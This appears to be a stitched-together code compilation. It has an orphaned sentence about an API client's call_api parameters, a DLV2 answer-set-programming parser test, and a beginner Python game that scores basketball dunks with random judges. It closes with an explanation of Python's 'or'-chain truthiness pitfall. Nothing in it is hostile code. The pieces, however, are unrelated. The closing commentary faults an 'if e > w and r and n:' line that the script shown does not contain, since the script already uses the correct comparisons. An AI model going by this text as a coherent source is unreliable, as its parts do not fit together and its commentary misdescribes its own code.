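The real client additionally threads `_return_http_data_only`, `_preload_content`, and `_request_timeout` through to `api_client.call_api`.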
# Source: tests/parser/bug.76.test.py from repo veltri/DLV2
# (commit 944aaef803aa75e7ec51d7e0c2b0d964687fdd0e, license: Apache-2.0)
input = """
%% start file count.dl %%
%#maxint = 5.
n(1).
n(2).
n(3).
a(X) :- X > 0, X < #count{Z : n(Z) }. %#int(X), X > 0, X < #count{Z : n(Z) }.
b(X) :- X < #count{Z : n(Z) }. %#int(X), X < #count{Z : n(Z) }.
c(X1) :- X1 < #count{Z : n(Z) }, X=1+X1. %#int(X), X1 < #count{Z : n(Z) }, +(X, 1, X1).
%% end %%
"""
output = """
%% start file count.dl %%
%#maxint = 5.
n(1).
n(2).
n(3).
a(X) :- X > 0, X < #count{Z : n(Z) }. %#int(X), X > 0, X < #count{Z : n(Z) }.
b(X) :- X < #count{Z : n(Z) }. %#int(X), X < #count{Z : n(Z) }.
c(X1) :- X1 < #count{Z : n(Z) }, X=1+X1. %#int(X), X1 < #count{Z : n(Z) }, +(X, 1, X1).
%% end %%
"""
# Source: dunker.py from repo lop2345/NBA-ALL-STAR-PUBLIC
# (commit 6fe70c27f40a4a0e8ea1926e735994e934515dff, license: BSL-1.0)
import random
# I am using random variable names
def dunk_score():
    # 30% chance of a good dunk: y falls in 1..30 out of 1..100.
    # (The original `if y == 1 or 2 or ... or 30` was always true,
    # because each bare integer in an `or` chain is truthy.)
    y = random.randrange(1, 101)
    x = 1 if y <= 30 else 2
    print("1 is good dunk,2 is bad dunk.")
    print(x)
    a = int(input("Rate this dunk:"))
    if x == 1:
        low, high = 7, 10  # good dunk: the other judges score 7-10
    else:
        low, high = 1, 6   # bad dunk: the other judges score 1-6
    b = random.randint(low, high)
    c = random.randint(low, high)
    d = random.randint(low, high)
    f = random.randint(low, high)
    print("judge 1 score:", a)
    print("judge 2 score:", b)
    print("judge 3 score:", c)
    print("judge 4 score:", d)
    print("judge 5 score:", f)
    total = a + b + c + d + f
    print("Final score is:", total)
    if x == 1:
        print("Great dunk!" if total >= 45 else "Good dunk!")
    else:
        print("Bad dunk!" if total <= 20 else "Solid dunk!")
    return total

# Four dunks; the first score wins only if it beats all the others.
e = dunk_score()
n = dunk_score()
r = dunk_score()
w = dunk_score()
if e > w and e > r and e > n:
    print("dunker 1 is winner")
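One Python pitfall worth spelling out for scripts like this: a condition written as `y == 1 or 2 or 3 ... or 30` does not test whether `y` is one of those values. It parses as `(y == 1) or 2 or ...`, and any bare nonzero integer is truthy, so the whole expression is always true. A chained comparison or membership test is the correct form; a quick self-contained demonstration:

```python
y = 99  # a value outside 1..30

# `y == 1 or 2` parses as `(y == 1) or 2`; the bare 2 makes the result truthy
assert bool(y == 1 or 2 or 3) is True  # true regardless of y

# Correct ways to test "y is between 1 and 30":
assert (1 <= y <= 30) is False
assert (y in range(1, 31)) is False
```

The same reasoning applies to `if e > w and r and n:`, which checks only that `r` and `n` are nonzero rather than comparing them to `e`.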